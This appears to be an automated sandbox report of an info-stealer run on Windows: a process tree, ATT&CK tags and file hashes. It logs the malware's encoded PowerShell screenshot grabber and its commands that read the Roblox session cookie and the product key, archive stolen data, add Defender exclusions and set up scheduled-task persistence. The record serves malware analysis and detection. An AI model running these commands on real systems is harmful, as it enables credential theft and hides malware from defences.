0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5308 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nuhankyn\nuhankyn.cmdline"6⤵PID:2320
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES683B.tmp" "c:\Users\Admin\AppData\Local\Temp\nuhankyn\CSC1007D827E0DB4D0691D446D8EC7DD28E.TMP"7⤵PID:1388
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5524
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5552
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6028
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:6060
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5136
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5180
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5672
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5836
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5992
-
C:\Windows\system32\getmac.exegetmac5⤵PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1772"4⤵PID:6080
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17725⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1772"4⤵PID:996
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17725⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4572"4⤵PID:5444
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45725⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4572"4⤵PID:5188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5176
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45725⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3336"4⤵PID:1868
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 33365⤵
- Kills process with taskkill
PID:4028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3336"4⤵PID:2212
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 33365⤵
- Kills process with taskkill
PID:5640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4280"4⤵PID:5868
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42805⤵
- Kills process with taskkill
PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4280"4⤵PID:5736
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42805⤵
- Kills process with taskkill
PID:5688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4172"4⤵PID:5912
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41725⤵
- Kills process with taskkill
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4172"4⤵PID:5820
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41725⤵
- Kills process with taskkill
PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4272"4⤵PID:612
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42725⤵
- Kills process with taskkill
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4272"4⤵PID:1624
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42725⤵
- Kills process with taskkill
PID:5928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2984"4⤵PID:1532
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1672
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29845⤵
- Kills process with taskkill
PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2984"4⤵PID:5592
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29845⤵
- Kills process with taskkill
PID:5772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AbVMg.zip" *"4⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\_MEI49882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI49882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AbVMg.zip" *5⤵
- Executes dropped EXE
PID:4672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:6104
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:4524
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5040
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:1588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:392
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:5740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\test.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "test" /SC ONLOGON /TR "C:\Windows\System32\test.exe" /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:452
-
-
C:\Windows\System32\test.exe"C:\Windows\System32\test.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\test.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'test.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\discord.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5524
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\discord.exe"3⤵
- Creates scheduled task(s)
PID:1572
-
-
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4476
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:688
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5336
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:716
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:2168
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4068
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4896
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:3532
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:3092
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:2424
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:1104
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:1492
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5016
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5040
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:3068
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:1520
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:3844
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:2436
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5636
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:1592
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:2124
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5032
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:2916
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5448
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4960
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4048
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5220
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:5504
-
C:\Users\Admin\discord.exeC:\Users\Admin\discord.exe1⤵
- Executes dropped EXE
PID:4580
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
944B
MD5be67063c62a242565760a02a642a9f02
SHA1d1043a892b44d6676f71b568f578fff947266a19
SHA25656f158298dc5f781d6636a0b15d040f9cffb1d46cd11079aa40a26b662217f48
SHA51290d2cbd882ff8043412ad25e74df0cf6b71d6f3fbdfa6f1efa0efc8eed86a925606c7d2e967f112a34d3f0e04f01a396898508571400dcf7e6fd69e78f406638
-
Filesize
64B
MD52992852f9d67051b2c7bf55b11a16c97
SHA1836547066c5714dcdea4efa9e8dd561a73d6b68e
SHA2563113b32090622c9b58fbf88d22386f3ed00cce0b147cdfc5f11d37b7cc1ff4b4
SHA51287267c11426326459d157598d6a3abf35f3a8a9d77dd40b1c7fc3fd9acd6628e4317d51881522a2fe79a3118efeed098034a535d673f1ce49fad258b58068441
-
Filesize
944B
MD590355e74a38e1aab8c3a306b3021da95
SHA14636ca6d7a6e4e3fc740a6a220826b5329b76e1f
SHA2565851b1399bab7cbbbec6259b420ef8b2e6d1e8e9e03938d4ee0c04e3597c7658
SHA51263e2b243a807d3e9d8aea8829d695e48d1c5731ae1ba2324870ce94bbf37e74ed00d923f28c2816da338380800de840ea05e855aa870451d64d2274eb3d6a785
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
1KB
MD5aefa3725172f02917253257da096d00c
SHA17fb487f7f72b056a79e05fcc62007b0f7746a05b
SHA256044bfb7da4758d3a4145e98c645aeb60da42c34dbf05884670e00a2e237edaad
SHA5126da940c6059d6423bd8b54b5a694e85359ec22b5cb27e35361fd375e998efd71ac1f2e7f70a86a32927d7ec228683f219077dec8f66b18c6bd8c7cb7c0c7fac6
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
944B
